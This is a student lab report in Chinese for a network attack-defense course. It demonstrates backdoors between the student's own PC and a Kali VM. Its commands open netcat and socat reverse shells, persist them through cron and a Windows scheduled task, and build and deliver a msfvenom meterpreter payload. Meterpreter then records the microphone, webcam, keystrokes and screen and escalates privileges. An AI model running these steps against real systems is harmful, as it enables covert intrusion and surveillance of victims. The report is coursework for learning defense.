20174324 次旦加措 网络对抗技术 Exp2-后门原理与实践
一 实验名称
后门原理与实践
1.1 实验内容
使用Netcat获取主机操作 Shell,cron启动。
使用socat获取主机操作Shell,任务计划启动。
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。
可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
1.2 实验目标
掌握后门的概念,知道常见的后门种类,深入理解后门的运作原理。
掌握几种常见的后门工具,学会利用后门工具进行一些简单操作。
增强信息安全意识,认识到后门的危害性,提高对后门的防范意识。
二 实验开始
1准备
在https://gitee.com/wildlinux/NetSec/attach_files中,可以下载本次实验所需的ncat.rar和socat.rar。
将压缩包解压,放到指定的位置,即完成“安装”。
2 查询IP地址
在PC中的cmd中,使用ipconfig指令,得知PC机IP地址为192.*********
在Kali中打开终端,输入ip add,得知Kali端IP地址为192.********
3 Win获得Linux Shell
在PC端打开cmd,输入ncat -l -p 4314。
在Kali端打开终端,输入nc 192.168.1.194 4314 -e /bin/sh。
返回PC端,发现PC端成功攻击Kali端,输入ls测试,可以读取到Kali端的目录。
4 Linux获得Windows Shell
在Kali端打开终端,输入nc -l -p 4314。
在PC端打开cmd,输入ncat -e cmd.exe 192.168.133.130 4314。
返回Kali端,发现Kali端成功攻击PC端。
5 netcat传输数据
在PC输入ncat -l 4324。
在Kali端输入192.********* 4324。
连接成功,双方即可以相互通信。
6 netcat传输文件
在PC端输入ncat -l 4324> 20174324.txt。
在Kali端输入nc 192.********4324 < PC_to_Kali.out。
即可在Kali端查询到PC端传输的文件。
在Kali端输入nc -l 4324 > 20174324.txt。
在PC端输入ncat 192.******* 4324 < Kali_to_PC.out。
即可在PC端查询到Kali端传输的文件。
7 使用 Netcat 获取主机操作 Shell ,cron 启动
在PC端,输入ncat -l -p 4324,回车。
在Kali端,输入crontab -e,回车,选择5,回车。
在Kali端,按i,在最后一行添加43 * * * * /bin/netcat 192.*******4324 -e /bin/sh,回车。
8 使用socat获取主机操作Shell,任务计划启动
在PC端, 在Windows主机上按下win+r,输入compmgmt.msc唤出计算机管理界面,在这里创建一个新的定时任务。
打开【计算机管理】-【系统工具】-【任务计划程序】-【创建任务】
打开【创建任务】-【触发器】-【新建...】。
设置【开始任务】为【工作站锁定时】。
打开【操作】-【新建...】。
将【操作】设置为【启动程序】。
将【程序或脚本】设置为socat的保存路径,此处设置为【C:\Users\8888\socat.exe】。
将【添加参数】设置为【tcp-listen:4324 exec:cmd.exe,pty,stderr】。
打开【任务计划程序】-【任务计划程序库】。
在PC端,锁定计算机,再启动计算机。
在Kali端,输入socat - tcp:192.***********
【执行socat,连接到PC端的4314端口,成功获得cmd Shell。】
9 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali端,输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.133.130 LPORT=4314 -f exe > backdoor_20174314.exe,回车。
在PC端,输入ncat.exe -lv 4314 > backdoor_20174314.exe,回车。
在Kali端,输入nc 192.168.1.194 4314 < backdoor_20174314.exe,回车。
【在Kali内生成后门程序,并将Kali端设置为控制端。在PC端开启文件接受模式,并在Kali端传输文件,即完成将后门文件置入PC端。】
在Kali端,输入msfconsole,回车。
在Kali端,输入use exploit/multi/handler,回车。
在Kali端,输入set payload windows/meterpreter/reverse_tcp,回车。
在Kali端,输入set LHOST 192.***********,回车。
在Kali端,输入set LPORT 4324,回车。
在Kali端,输入exploit,回车。
在PC端,输入backdoor_20174324.exe。
在Kali端,输入dir,回车。
【Kali端通过msf进行监听,同时PC端也将后门为其敞开,Kali端就得到了Shell。】
9.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
在Kali端,输入record.mic。通过指令可以截获音频。
在Kali端,输入webcam_snap。可以通过指令使用摄像头拍照。
在Kali端,输入keyscan_start。
在PC端,使用微信输入一串字符。
在Kali端,输入keyscan_dump,回车。
【可以通过指令读取键盘输入记录。】
在Kali端,输入screenshot,回车,可以通过指令截取屏幕
输入getuid,回车。
输入system,回车。
输入msfconsole,回车。
输入use exploit/multi/handler,回车。
输入use exploit/windows/local/ask,回车。
输入set payload windows/meterpreter/reverse_tcp,回车。
输入set lhost 192.**********,回车。
输入set filename win_update.exe,回车。
输入set session 1,回车。
输入options,回车。
输入exploit,回车。
输入getuid,回车。
输入getsystem,回车。【成功提权。】
5.1 实验问题回答
5.1.1 例举你能想到的一个后门进入到你系统中的可能方式?
游览网站中附带的广告或弹出的不正规软件。
5.1.2 例举你知道的后门如何启动起来(win及linux)的方式?
windows操作系统有定时任务启动,linux有定时任务启动。